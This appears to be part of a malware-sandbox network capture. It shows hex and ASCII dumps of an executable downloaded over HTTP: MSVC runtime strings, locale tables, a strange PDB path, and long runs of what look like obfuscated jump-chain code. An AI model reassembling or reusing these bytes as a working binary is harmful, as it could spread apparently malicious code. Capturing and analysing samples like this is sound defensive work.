70 20 65 72 72 6f 72 0d 0a 00 00 00
                                                                              Data Ascii: wio initializationR6026- not enough space for stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap error
                                                                              2022-06-01 23:53:42 UTC198INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68
                                                                              Data Ascii: h
                                                                              2022-06-01 23:53:42 UTC199INData Raw: 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 48 48 3a 6d 6d 3a 73 73 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00
                                                                              Data Ascii: PQRSTUVWXYZ{|}~HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJuly
                                                                              2022-06-01 23:53:42 UTC200INData Raw: 61 64 20 79 20 74 6f 62 61 67 6f 00 00 00 65 6e 67 6c 69 73 68 2d 73 6f 75 74 68 20 61 66 72 69 63 61 00 00 00 00 65 6e 67 6c 69 73 68 2d 6e 7a 00 00 65 6e 67 6c 69 73 68 2d 6a 61 6d 61 69 63 61 00 65 6e 67 6c 69 73 68 2d 69 72 65 00 65 6e 67 6c 69 73 68 2d 63 61 72 69 62 62 65 61 6e 00 00 00 65 6e 67 6c 69 73 68 2d 63 61 6e 00 65 6e 67 6c 69 73 68 2d 62 65 6c 69 7a 65 00 00 65 6e 67 6c 69 73 68 2d 61 75 73 00 65 6e 67 6c 69 73 68 2d 61 6d 65 72 69 63 61 6e 00 00 00 00 64 75 74 63 68 2d 62 65 6c 67 69 61 6e 00 00 00 63 68 69 6e 65 73 65 2d 74 72 61 64 69 74 69 6f 6e 61 6c 00 63 68 69 6e 65 73 65 2d 73 69 6e 67 61 70 6f 72 65 00 00 00 63 68 69 6e 65 73 65 2d 73 69 6d 70 6c 69 66 69 65 64 00 00 63 68 69 6e 65 73 65 2d 68 6f 6e 67 6b 6f 6e 67 00 00 00 00 63
                                                                              Data Ascii: ad y tobagoenglish-south africaenglish-nzenglish-jamaicaenglish-ireenglish-caribbeanenglish-canenglish-belizeenglish-ausenglish-americandutch-belgianchinese-traditionalchinese-singaporechinese-simplifiedchinese-hongkongc
                                                                              2022-06-01 23:53:42 UTC202INData Raw: 33 32 2e 44 4c 4c 00 00 28 00 6e 00 75 00 6c 00 6c 00 29 00 00 00 00 00 28 6e 75 6c 6c 29 00 00 00 00 00 00 06 00 00 06 00 01 00 00 10 00 03 06 00 06 02 10 04 45 45 45 05 05 05 05 05 35 30 00 50 00 00 00 00 28 20 38 50 58 07 08 00 37 30 30 57 50 07 00 00 20 20 08 00 00 00 00 08 60 68 60 60 60 60 00 00 78 70 78 78 78 78 08 07 08 00 00 07 00 08 08 08 00 00 08 00 08 00 07 08 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d
                                                                              Data Ascii: 32.DLL(null)(null)EEE50P( 8PX700WP `h````xpxxxxEEE00P('8PW700PP (`h`hhhxppwppSunMonTueWedThuFriSatJanFebM
                                                                              2022-06-01 23:53:42 UTC203INData Raw: 67 75 61 72 64 27 00 00 00 00 60 74 79 70 65 6f 66 27 00 00 00 00 60 76 63 61 6c 6c 27 00 60 76 62 74 61 62 6c 65 27 00 00 00 60 76 66 74 61 62 6c 65 27 00 00 00 5e 3d 00 00 7c 3d 00 00 26 3d 00 00 3c 3c 3d 00 3e 3e 3d 00 25 3d 00 00 2f 3d 00 00 2d 3d 00 00 2b 3d 00 00 2a 3d 00 00 7c 7c 00 00 26 26 00 00 7c 00 00 00 5e 00 00 00 7e 00 00 00 28 29 00 00 2c 00 00 00 3e 3d 00 00 3e 00 00 00 3c 3d 00 00 3c 00 00 00 25 00 00 00 2f 00 00 00 2d 3e 2a 00 26 00 00 00 2b 00 00 00 2d 00 00 00 2d 2d 00 00 2b 2b 00 00 2a 00 00 00 2d 3e 00 00 6f 70 65 72 61 74 6f 72 00 00 00 00 5b 5d 00 00 21 3d 00 00 3d 3d 00 00 21 00 00 00 3c 3c 00 00 3e 3e 00 00 20 64 65 6c 65 74 65 00 20 6e 65 77 00 00 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f
                                                                              Data Ascii: guard'`typeof'`vcall'`vbtable'`vftable'^=|=&=<<=>>=%=/=-=+=*=||&&|^~(),>=><=<%/->*&+---++*->operator[]!===!<<>> delete new__unaligned__restrict_
                                                                              2022-06-01 23:53:42 UTC204INData Raw: 9a 88 d3 4e 85 42 9f ca e8 62 a8 6c 01 00 00 00 43 3a 5c 54 65 78 5c 52 61 73 20 73 61 76 5c 51 75 65 76 61 68 5c 42 6f 70 6f 20 6e 61 6e 2e 70 64 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 c0 54 00 58 37 40 00 00 00 00 00 00 00 00 00 03 00 00 00 68 37 40 00 78 37 40 00 bc 38 40 00 08 39 40 00 00 00 00 00 04 c0 54 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 58 37 40 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d0 54 00 24 39 40 00 00 00 00 00 00 00 00 00 00 00 00 00 30 c0 54 00 bc 37 40 00 00 00 00 00 00 00 00 00 01 00 00 00 cc 37 40 00 d4 37 40 00 00 00 00 00 30 c0 54 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 bc 37 40 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ce 54 00 04 38 40 00 00 00 00 00 00 00 00 00 02 00 00
                                                                              Data Ascii: NBblC:\Tex\Ras sav\Quevah\Bopo nan.pdbTX7@h7@x7@8@9@T@X7@T$9@0T7@7@7@0T@7@T8@
                                                                              2022-06-01 23:53:42 UTC206INData Raw: ec 51 89 4d fc 8b 45 fc c7 00 fc 11 40 00 8b 4d fc 83 c1 0c e8 85 c1 00 00 8b 4d fc e8 76 dc 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc 83 c1 0c e8 7e c1 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 a1 ff ff ff 8b 45 08 83 e0 01 74 0c 8b 4d fc 51 e8 83 e3 00 00 83 c4 04 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 fd fe ff ff 8b 4d fc c7 01 08 12 40 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc c7 00 08 12 40 00 8b 4d fc e8 38 ff ff ff 8b e5 5d c3 cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 d1 ff ff ff 8b 45 08 83 e0 01 74 0c 8b 4d fc 51 e8 03 e3 00 00 83 c4 04 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55
                                                                              Data Ascii: QME@MMv]UQMM~]UQMMEtMQE]UQMEPMM@E]UQME@M8]UQMMEtMQE]U
                                                                              2022-06-01 23:53:42 UTC207INData Raw: a2 fa 03 51 e9 75 01 00 00 b6 05 4c 7d 05 b9 fc c0 f7 f0 40 6e 85 92 48 d9 32 e2 47 06 64 4c ee e9 ed fc ff ff f8 38 2a 52 34 71 20 b6 4d 3a 32 e9 47 0c 00 00 18 f2 6e 35 a4 85 8c ac 1e b9 40 90 44 d1 84 f6 f6 20 37 e2 fd cb 99 2a a0 1b 77 1f f5 e9 dc 03 00 00 c0 36 ee 12 b1 28 26 2c 60 e9 5d ff ff ff 4b 83 5d 98 fa ba 8d d3 dd 23 e7 09 eb 80 3c a1 39 c0 3d d8 56 16 f5 e9 e8 fc ff ff 4d d8 e7 2b c2 0b e4 a3 af e9 05 04 00 00 a3 67 e3 ed 86 70 80 dc a2 fc 81 e9 d3 01 00 00 fd 31 f3 b1 65 f9 da 06 29 48 19 83 2f e9 07 09 00 00 00 b2 7a 30 52 72 cd e6 e9 93 06 00 00 86 02 9b d2 38 74 74 80 4d 1e ac d7 7b 41 fe d0 46 03 05 63 de 41 bb dd e9 51 fd ff ff 0d 22 57 07 57 e7 1c bc 42 06 bb c1 6c 20 a9 bc 37 f0 ad ee e9 cc 0a 00 00 32 b9 84 cc 96 58 66 26 d4 83 c8
                                                                              Data Ascii: QuL}@nH2GdL8*R4q M:2Gn5@D 7*w6(&,`]K]#<9=VM+gp1e)H/z0Rr8ttM{AFcAQ"WWBl 72Xf&
                                                                              2022-06-01 23:53:42 UTC208INData Raw: c4 09 3f 55 d6 5c 66 bf eb 89 b7 1f e2 e7 33 aa 90 04 ca 6c a5 6e 9b af 42 a0 7c 94 52 e0 e9 0e 07 00 00 1f f4 cd a8 db fa e5 21 41 93 8a ea 49 93 96 f6 5d e9 fc 02 00 00 8a 32 09 04 ab 0d ee d9 e9 d4 fa ff ff 4d 95 20 60 b1 c0 a4 f5 86 19 e9 7a fd ff ff 8a 85 3e 3b a3 bc e5 c2 49 21 79 b5 09 e9 d6 01 00 00 16 68 bf 1d 2c be 60 70 e9 f1 f6 ff ff 03 bd 32 3d f7 79 b6 73 74 24 08 6d c6 68 87 ab eb e9 48 1c e8 5f ad c3 8f cc aa 00 d1 06 f4 9b b2 37 6f 6d e9 9b fa ff ff ec 40 0f 35 24 21 3d d4 bd e2 9c 17 69 09 33 a5 e9 9a 06 00 00 f3 5f 85 0b d5 98 59 c8 e4 71 c9 99 f7 96 a4 f0 1a 48 e9 07 02 00 00 ea b3 67 82 cd 02 2e 81 7c e9 d0 fa ff ff 22 c6 2b 2b de e9 0b 08 00 00 86 a8 f8 bd 61 17 2a 94 e9 7c fd ff ff 27 5d d1 fb 24 87 3b a2 6d d5 41 07 ca 47 e9 04 06
                                                                              Data Ascii: ?U\f3lnB|R!AI]2M `z>;I!yh,`p2=yst$mhH_7om@5$!=i3_YqHg.|"++a*|']$;mAG
                                                                              2022-06-01 23:53:42 UTC209INData Raw: ff ff 97 9c d5 a4 ce 58 1d fd 27 91 75 fd d1 08 f1 e9 91 02 00 00 8c 9a f2 78 8f bb 21 10 ca 05 e9 c1 f5 ff ff 5c 1a ee 7b 3a ef d7 b2 c4 e9 dd fe ff ff ad 01 b8 db c1 3c ec e9 c5 fa ff ff 2f 7f 03 fc 55 cb 49 5c 06 7f 59 d6 39 e9 af f9 ff ff b8 fc 02 b0 73 e9 79 fd ff ff 07 b0 ab eb 92 64 36 6c cb 67 45 bb 07 ce 08 11 3b a5 a4 af 75 e9 78 06 00 00 1b bd 2b 0c c7 e4 e9 de fe ff ff 63 21 8e 1c 7d b5 7a 0a 23 a7 70 ed 90 33 b1 dc bf fb 0f e8 f7 9d 07 b0 01 a3 e9 f6 fc ff ff ce c2 d6 ea 20 34 5f e9 e9 13 fb ff ff 8b 06 37 03 42 f2 f8 a3 1a e9 b7 99 64 3c 3a 9a 77 bd 16 97 bf 93 f7 27 8f 45 fe 1b 2c e9 ae f7 ff ff 60 99 9a 2c ca c6 31 31 4d 18 e9 0a fb ff ff af d8 62 c6 11 b0 f8 09 8e db 0f 35 33 e9 13 03 00 00 cd cd 13 cc 52 7d cd 92 3e 9b 21 53 aa 3a e9 17
                                                                              Data Ascii: X'ux!\{:</UI\Y9syd6lgE;ux+c!}z#p3 4_7Bd<:w'E,`,11Mb53R}>!S:
                                                                              2022-06-01 23:53:42 UTC210INData Raw: 84 c8 ca bf f9 e9 cd fc ff ff 8f 5a d6 aa 1d 9b 7e 84 83 c2 42 55 9c 17 f0 bd ab e9 7b fa ff ff c5 75 94 18 2e 18 bf f8 0d bc f2 f1 9e ec 73 e9 f8 fe ff ff ce 29 4b bf b6 1f 7e ed 76 6d 77 7a f0 cb a9 29 e9 a8 fc ff ff fb e4 86 2d 09 e9 d3 f9 ff ff d3 73 af 76 06 74 e9 cd e9 0b f9 ff ff 49 15 16 81 09 ef 3f 6d 06 43 a7 16 31 e9 22 f8 ff ff 86 f9 b8 ea e9 67 ff ff ff f0 bd f0 a6 85 c5 06 e3 89 99 6c ce e9 c6 f3 ff ff fa 0e 36 54 e7 92 92 bd 43 83 e6 71 e9 87 ef ff ff 2e 50 18 a3 89 16 1b 06 90 fd be 61 63 45 d6 7a f8 08 03 cf ed 09 a7 27 7c 55 73 80 e9 a5 f0 ff ff 75 ed 58 4a b5 a3 c3 b2 0c 60 7b dc e9 ef f9 ff ff cd e7 ea f5 3f c0 2f 8b 69 e5 0e 5b 14 60 4a 41 ec 8a 61 c9 ad 83 f0 dc d4 e9 df f2 ff ff 42 7c 14 45 e9 36 f5 ff ff d3 83 4c f3 0a 5b e9 1a ff
                                                                              Data Ascii: Z~BU{u.s)K~vmwz)-svtI?mC1"gl6TCq.PacEz'|UsuXJ`{?/i[`JAaB|E6L[
                                                                              2022-06-01 23:53:42 UTC211INData Raw: ca b4 f6 33 96 c0 20 e9 62 04 00 00 53 67 c5 8c 0d 37 b8 6f 1a 33 a8 ac 74 6b 66 5e 71 68 83 a0 3e a7 bf 7a 26 a5 eb 8d 8e 65 90 61 6b 2c 11 a8 e9 2f 02 00 00 53 1f 59 cb 1e d2 ee f8 69 fd 51 d0 cb 06 95 56 5b eb 6f 1e 51 61 53 74 50 28 9e bd df e9 ad 00 00 00 87 e0 1c 65 a0 2f f6 d7 db d0 db 98 6b 49 93 3f 0d 95 70 45 ec d2 21 30 c6 e1 e9 1e 0e 00 00 09 2c 66 3e e9 4b 01 00 00 4e a9 ca 44 a6 57 10 88 58 ab 2f e9 9a 01 00 00 31 04 69 0a 06 7e ca 6d cc 64 c9 85 d9 6a e9 fe fe ff ff 91 3f 50 46 f7 4b 5a 46 0d f8 f2 e0 1b 7b 0a c5 fb 73 3e 79 27 e9 a8 00 00 00 36 4a 65 67 e4 23 b1 74 63 60 66 a0 d7 18 18 77 e3 eb 83 b0 7d a6 c2 38 38 fa c4 84 51 21 a9 88 15 a1 60 a7 c2 e5 b8 e9 43 08 00 00 33 c8 1a 87 2d fb 9c 39 e6 7f 0e 3e d4 72 e9 f3 07 00 00 2f 0d c9 10
                                                                              Data Ascii: 3 bSg7o3tkf^qh>z&eak,/SYiQV[oQaStP(e/kI?pE!0,f>KNDWX/1i~mdj?PFKZF{s>y'6Jeg#tc`fw}88Q!`C3-9>r/
                                                                              2022-06-01 23:53:42 UTC213INData Raw: c8 83 87 77 10 54 0e d4 27 54 08 62 b4 e9 05 08 00 00 40 8f 28 51 26 90 00 84 2c a4 3f f2 e9 4c fe ff ff b8 78 2b 6b 8e f0 44 72 99 69 0a c1 82 04 e9 0e 09 00 00 ba a6 58 89 01 bf d5 05 74 b5 e9 c4 80 65 f4 f4 5c e9 0a 03 00 00 68 07 bc e2 b2 71 e1 ee e9 8f fb ff ff 4d 7a 08 f6 09 e3 05 c7 9d 4a fb 48 e9 af 02 00 00 11 0f 82 06 a7 7e bc 2b e9 2e fa ff ff b2 fe ad a8 43 a4 50 93 09 3d de 70 73 dc 28 3b e9 0d 02 00 00 91 7f a5 5d 2f 8d 1d f4 25 69 27 2c 21 51 5e 62 85 be e9 69 03 00 00 6a 93 81 46 7c 05 5f e9 80 fb ff ff d1 35 18 e6 11 07 db d9 97 d4 50 0d da 74 9b bb 46 11 0f f5 83 81 e9 bb 00 00 00 c9 39 7d 01 48 fb 8f 32 42 c5 08 a5 84 df e7 a1 e5 11 3b e9 f5 fa ff ff dd 73 59 32 8b 3a 95 2a 2b a0 b4 11 12 a7 64 b7 3f e6 93 4c 51 53 ac 0b ba e4 99 68 a8
                                                                              Data Ascii: wT'Tb@(Q&,?Lx+kDriXte\hqMzJH~+.CP=ps(;]/%i',!Q^bijF|_5PtF9}H2B;sY2:*+d?LQSh
                                                                              2022-06-01 23:53:42 UTC214INData Raw: b7 de ea e9 89 fd ff ff f5 ae bf 38 e9 c8 f5 ff ff 8f fb e4 ed 09 29 e2 af 14 da 1c f5 a6 c6 0d 7e 3d e9 be fa ff ff 94 2b 20 6b d5 49 b6 70 00 11 69 13 e9 a9 00 00 00 ce 65 95 43 2c 48 8f 23 bc 0c cb e9 20 01 00 00 9b 7e 2b 81 65 7b 75 e9 44 f4 ff ff 40 06 8a 27 6f ed ac 07 39 be 70 e9 e9 e1 f9 ff ff aa e2 14 ad ba 0b 93 b3 32 e9 92 f4 ff ff 3d d3 5e 41 b5 90 16 8b 2f 05 3a 7c 2d 4c 3b e9 09 fe ff ff 3d 9d a4 5c 38 d5 6e b6 68 e9 5b fb ff ff 84 2d 11 89 2a 39 55 e5 1f 14 0a bf 88 47 e9 3c f9 ff ff 76 e2 97 25 56 da f2 21 36 4b d6 7a 20 b1 60 ac 7b e9 0e 02 00 00 5a fc 25 42 ec cc a0 cd e2 85 df 8e fd b5 2d 25 d7 c6 38 25 93 8c e9 3c f9 ff ff 82 d1 d6 b8 2a cd 7f 51 e9 17 fd ff ff 9b 13 3d d6 19 d6 5b fe 29 c2 1c 14 a6 ab e0 02 bb e9 2c f7 ff ff 7d 24 ed
                                                                              Data Ascii: 8)~=+ kIpieC,H# ~+e{uD@'o9p2=^A/:|-L;=\8nh[-*9UG<v%V!6Kz `{Z%B-%8%<*Q=[),}$
                                                                              2022-06-01 23:53:42 UTC216INData Raw: 14 79 fa f3 6a 0b 4b 4e e9 9b 02 00 00 d7 cf fb cd c8 65 f9 95 e9 ab 03 00 00 a5 7e a8 4c c1 ca f8 60 aa 90 0b e5 33 83 b1 99 e6 b0 87 2f 83 e9 4e 08 00 00 cc 3f 26 8b 61 e9 12 07 00 00 44 f6 72 8a 99 7c 9e 80 c6 e9 e7 0d 00 00 b9 01 19 f3 5c 26 37 35 22 b3 b7 c4 e7 ac d1 14 45 4b 42 dd e9 32 0d 00 00 15 33 30 e5 46 75 db 6e e9 cd fe ff ff f4 fb 8e 74 da 23 73 9a ae 1d fc 0a 37 47 b2 80 ca ba e9 29 07 00 00 2b 76 12 a2 0e eb 87 71 7d 3c 35 03 d5 71 46 c1 85 83 e9 5a 0e 00 00 d2 63 03 b8 c2 3c 8a 1d 56 0f 07 64 80 80 e9 9e 03 00 00 55 a7 aa a8 55 f1 14 82 12 40 37 65 99 ea 80 87 a8 6c e9 e0 0b 00 00 b9 a2 a5 c3 37 d3 ac be 6a 27 33 0b 23 6e 4a ef 81 58 9d 90 a1 62 17 d2 c7 3d e9 f5 fe ff ff 3d fe e3 4e 19 95 e9 79 ff ff ff 5f 15 a1 6c 21 57 a6 83 e1 63 5f
                                                                              Data Ascii: yjKNe~L`3/N?&aDr|\&75"EKB230Funt#s7G)+vq}<5qFZc<VdUU@7el7j'3#nJXb==Ny_l!Wc_
                                                                              2022-06-01 23:53:42 UTC217INData Raw: 8a e9 f7 fc ff ff 78 e8 6b d0 2f 7b 0d 3c ad 60 ea 75 6a 43 49 94 99 5e c8 8c cf e2 4c 9a 07 f1 2a bb db 76 08 f9 e9 94 fc ff ff 08 ac f5 f3 e7 0e 38 e9 0d ff ff ff d8 89 3b 48 a3 69 42 6f e1 99 92 be e9 0a fa ff ff fc 41 ac a2 d8 49 79 81 45 e9 37 fb ff ff 8c b1 77 2c 9d 0a 00 9e df e9 3e 05 00 00 f5 c5 68 26 67 18 4d 7b 2b a0 f9 49 e9 3d f9 ff ff ce 48 d9 a1 58 e1 0f 29 32 be 3f 05 f5 f1 3c 75 e9 51 01 00 00 da 41 9f 8f c9 d3 bb 01 78 bb 7e 13 c4 65 62 66 c9 e9 ee fc ff ff af 72 36 0f c6 e9 57 c6 29 8c 50 13 e9 51 fd ff ff 27 13 8d ce e7 8f e9 e1 06 00 00 84 6f 4b d9 0e 9a 3d 3d e1 d2 37 eb a7 fa 39 1b 6e 37 f2 30 3a 17 4e 51 94 57 f3 e9 12 ff ff ff bb fc 25 ed 03 88 07 f9 aa e9 97 02 00 00 a6 bb e8 e3 92 a0 8d 77 13 bd e9 be 02 00 00 4c 14 c5 4a 99 e9
                                                                              Data Ascii: xk/{<`ujCI^L*v8;HiBoAIyE7w,>h&gM{+I=HX)2?<uQAx~ebfr6W)PQ'oK==79n70:NQW%wLJ
                                                                              2022-06-01 23:53:42 UTC218INData Raw: d0 d4 6a 0b e9 00 f7 ff ff 18 14 28 1f ca 0c 78 69 f9 97 39 df 28 e9 be 05 3d d7 f0 e9 4a f5 ff ff 2e 5e 5b ee 4a 25 e9 55 23 e5 fa 22 55 b6 e9 96 fc ff ff 61 a7 c0 1b 48 56 d3 90 04 e1 c4 ea e9 3a 03 00 00 88 79 57 1f 14 9f 95 09 93 2d de b2 e1 ad 27 ab 9b 38 a0 f0 37 bf ef e9 b0 fb ff ff f0 ac d9 7c 62 e8 06 4a 94 c0 c2 7b 9a 3a 85 fb c5 bb 79 d1 e9 fb f4 ff ff aa 64 f8 0e a0 7a 3a 01 14 ef 25 fb 49 24 4e 47 9f 18 e9 bd 03 00 00 e1 fe 6a 39 6f 36 9f b6 9d 08 38 be e6 62 11 78 e6 31 f0 ba c2 d8 ec ad 8f 02 0f de e1 e9 1d f8 ff ff cc 55 de a3 5a c2 45 4a 8c 11 7a 89 88 b0 a7 bc e9 6a fd ff ff 12 3c 3b 9b 98 a4 96 89 29 e0 61 dc 00 51 21 f4 b0 32 0e 51 74 e1 e4 f0 27 7d e9 50 fe ff ff 40 48 44 53 3a 6c 2e 5d 38 7f e9 0d fe ff ff 5b e6 12 f4 39 ac 99 e3 40
                                                                              Data Ascii: j(xi9(=J.^[J%U#"UaHV:yW-'87|bJ{:ydz:%I$NGj9o68bx1UZEJzj<;)aQ!2Qt'}P@HDS:l.]8[9@
                                                                              2022-06-01 23:53:42 UTC220INData Raw: 03 47 54 33 7d 0b e9 7c 0b 00 00 f1 45 e5 69 5d 09 c6 29 e9 cd 05 00 00 ef 8b 32 91 7b 58 21 d5 65 2d 83 79 04 f9 08 b0 e9 37 02 00 00 cf 83 12 10 8d c9 84 f7 13 7d b4 c8 e9 c1 04 00 00 b0 b2 bc ae ad 96 58 e1 9e bc 26 69 e9 43 09 00 00 f4 33 c2 75 31 33 5d 7a c1 e9 e0 0d dd e9 f3 06 00 00 0c 2d 22 4a c3 3f aa da f1 bf 25 93 a7 a0 3a 97 ad 69 e9 76 ff ff ff 2e ac 07 9f eb 3f e9 fc 01 00 00 1b 1e 0d c7 89 0f 8d e2 e9 78 01 00 00 38 c1 c2 12 1e f3 ba 60 a5 e9 4f 0c 00 00 11 64 50 a4 9c 78 bc af e9 74 0c 00 00 43 57 0b ee d3 cd ae e6 38 62 18 e7 2e 3b 7a 6d e9 9a 08 00 00 d7 34 5a 32 60 51 0e f0 6c 75 30 d2 39 94 4a 9c c1 d5 e9 f6 0b 00 00 f7 f6 5f f3 46 88 13 b2 be e9 a0 fe ff ff 0a 70 70 2a de 14 16 de a6 1b b8 f1 00 e9 95 01 00 00 36 e9 03 6d 06 a2 68 19
                                                                              Data Ascii: GT3}|Ei])2{X!e-y7}X&iC3u13]z-"J?%:iv.?x8`OdPxtCW8b.;zm4Z2`Qlu09J_Fpp*6mh
                                                                              2022-06-01 23:53:42 UTC221INData Raw: 31 8e 8b e9 20 07 00 00 bc cb da 9c d4 19 64 66 47 a0 41 0f 2c e9 3b 06 00 00 ec eb 8b dc 28 28 bf 0d 44 8b ea e3 ea 94 8f e9 0e 02 00 00 74 32 cd 06 6f 07 13 ab 7f 02 da 51 22 a4 a0 ec 10 b3 8d 3e 3e 1b e2 d0 e9 33 fb ff ff 09 ba 4d d2 5f 3a 36 38 13 db 83 34 be 82 23 96 7a 97 32 c2 e9 b8 fa ff ff a7 be fe 6a 94 5e be b6 c5 c1 4d 6f 78 a5 15 ac d6 da 75 bf 17 8d e9 f0 fc ff ff cb d4 42 97 e9 dc fe ff ff 92 bd 8b 62 cc 22 1d df 69 0e 95 cd bd 0c 74 fa e9 3b fe ff ff 7f 8f ac 88 01 60 42 84 4c 95 bf e7 6e e9 4b fe ff ff 29 a1 31 8b 40 2e 71 20 d3 51 fc da f8 8a bd e9 bd fd ff ff f5 84 8d da ee 10 a4 1c 04 2c 0f 8f a0 79 e9 24 fa ff ff 82 df 3c 1a 24 35 3e c2 44 0a 40 08 f7 e9 32 06 00 00 12 bd e4 61 d2 0f e4 e9 84 fe ff ff df f6 cf cb 5c 6f 8c d9 3b 5d e9
                                                                              Data Ascii: 1 dfGA,;((Dt2oQ">>3M_:684#z2j^MoxuBb"it;`BLnK)1@.q Q,y$<$5>D@2a\o;]
                                                                              2022-06-01 23:53:42 UTC222INData Raw: 63 19 7a dc 36 e9 ed f7 ff ff 5b e5 72 1c 83 27 35 83 f6 a9 e9 77 f4 ff ff cf 5b 5f 60 f5 b9 d1 3e 1a e1 9d 01 32 e0 6b 15 fd 8b 8a 13 e9 ea f7 ff ff 74 85 b0 f8 70 57 d5 aa 20 7b 69 10 2d 28 6d 44 b9 29 7a 80 e6 f9 e9 45 f9 ff ff c4 01 fd 7d b9 3a ae cf c2 ab 94 e9 5e f8 ff ff 7c 56 d5 86 3e e9 2c ff ff ff 68 27 6e c5 fe ed cb b0 24 4d 29 ce cc 17 9b 98 74 d6 e9 3d fb ff ff 6c 51 69 2d f9 c3 b5 dd 96 b1 a2 c6 1e cb f1 36 98 b7 fb bf a1 d1 e9 00 f6 ff ff 81 cf 0b a5 2e e2 0e d9 9a 55 0d 83 6b f7 09 ac a9 9b fa e6 90 69 d3 ec e4 06 7c 45 60 eb 2d 17 76 e6 2c 1f 30 c4 8e 7b c2 9b e9 6a f6 ff ff 49 40 39 a8 48 87 e0 75 fc d7 d3 20 a3 06 d1 4f 10 2d a6 f2 e9 94 f4 ff ff 70 70 e4 a8 e9 43 ff ff ff c4 c2 37 82 ad d8 d2 84 be e9 57 f4 ff ff fc 8c c0 63 ae e9 66
                                                                              Data Ascii: cz6[r'5w[_`>2ktpW {i-(mD)zE}:^|V>,h'n$M)t=lQi-6.Uki|E`-v,0{jI@9Hu O-ppC7Wcf
                                                                              2022-06-01 23:53:42 UTC224INData Raw: 7b 05 00 00 44 79 18 21 6c 5c f2 fd 28 ac 9e 93 d8 82 f7 45 ea 0e d2 eb 16 a0 df 35 6f 4e a7 6e fd e9 c5 03 00 00 bd 54 6e 6d f4 47 96 58 0e e9 88 06 00 00 be 5e 69 34 e9 e7 01 00 00 cb ac 87 e4 bc 32 71 3f 27 b6 4f 60 12 1a ea 1d a3 e9 7e 03 00 00 1e 5a 46 5b 80 4f 69 01 a2 e4 e9 9f 07 00 00 75 d9 36 10 6f f7 5c c8 9e a6 85 fc 02 40 a8 bc 1c a8 80 10 4b 11 57 0d 37 04 e9 c2 fc ff ff 0d 95 16 85 26 f4 39 6a 7f 03 b5 fd 1c 09 41 33 b1 0f 12 69 89 24 1b 1d a1 b7 e9 49 fe ff ff aa 65 c7 aa e3 e9 1a fe ff ff f5 87 27 64 e1 d5 83 b1 4d fe f8 eb c5 06 a9 4a bd a5 ae 9c 62 c1 a8 61 7d c6 e9 66 fd ff ff 5c e3 7b 09 c2 bb 58 66 5e 38 57 ac 98 c5 e9 80 00 00 00 78 5c 6f 51 62 7c 9c 1c e9 2c 02 00 00 50 f9 1f 8d ed 37 ad 24 4e b5 e4 c2 e9 f2 06 00 00 fb ba b9 90 90
